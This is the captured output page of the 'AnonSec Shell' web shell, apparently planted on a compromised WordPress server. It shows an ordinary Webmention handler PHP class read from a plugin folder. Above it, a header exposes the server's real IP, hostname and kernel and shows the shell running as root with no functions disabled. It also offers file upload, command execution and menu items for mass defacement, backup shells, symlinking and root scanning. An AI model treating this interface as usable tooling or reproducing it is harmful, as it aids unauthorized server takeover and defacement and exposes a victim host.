AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 18.225.56.120   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/weglot/includes/Handler/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/weglot/includes/Handler/class-base.php
<?php

namespace Webmention\Handler;

use WP_Error;
use Webmention\Response;
use Webmention\Entity\Item;

/**
 * Base class for Webmention parsing and post processing.
 */
abstract class Base {

	/**
	 * Parsed Data as Item.
	 *
	 * @var Webmention\Entity\Item
	 */
	protected $webmention_item;


	/**
	 * Handler Slug to Uniquely Identify it.
	 *
	 * @var string
	 */
	protected $slug;

	/**
	 * Constructor.
	 *
	 * @param Webmention\Entity\Item $webmention_item The Webmention item.
	 */
	public function __construct( $webmention_item = null ) {
		if ( $webmention_item instanceof Item ) {
			$this->webmention_item = $webmention_item;
		} else {
			$this->webmention_item = new Item();
		}
	}

	/**
	 * Get Item.
	 *
	 * @return Webmention\Entity\Item
	 */
	public function get_webmention_item() {
		return $this->webmention_item;
	}

	/**
	 * Get Name of Slug.
	 *
	 * @return string
	 */
	public function get_slug() {
		return $this->slug;
	}

	/**
	 * Set Item.
	 *
	 * @param Webmention\Entity\Item $webmention_item the Webmention Item
	 *
	 * @return WP_Error|true
	 */
	public function set_webmention_item( $webmention_item ) {
		if ( ! ( $webmention_item instanceof Item ) ) {
			return new WP_Error(
				'wrong_data_format',
				__( '$webmention_item is not an instance of Webmention\Entity\Item', 'webmention' ),
				$webmention_item
			);
		}

		$this->webmention_item = $webmention_item;
		return true;
	}

	/**
	 * Generate Summary from Content.
	 *
	 * @param string $content Content.
	 *
	 * @return string Summary.
	 */
	public function generate_summary( $content ) {
		$content = wp_strip_all_tags( $content );
		return wp_trim_words( $content, 25 );
	}

	/**
	 * Takes a response object and parses it.
	 *
	 * @param Webmention\Response $response   Response Object.
	 * @param string              $target_url The target URL
	 *
	 * @return WP_Error|true Return error or true if successful.
	 */
	abstract public function parse( Response $response, $target_url );
}

Anon7 - 2022
AnonSec Team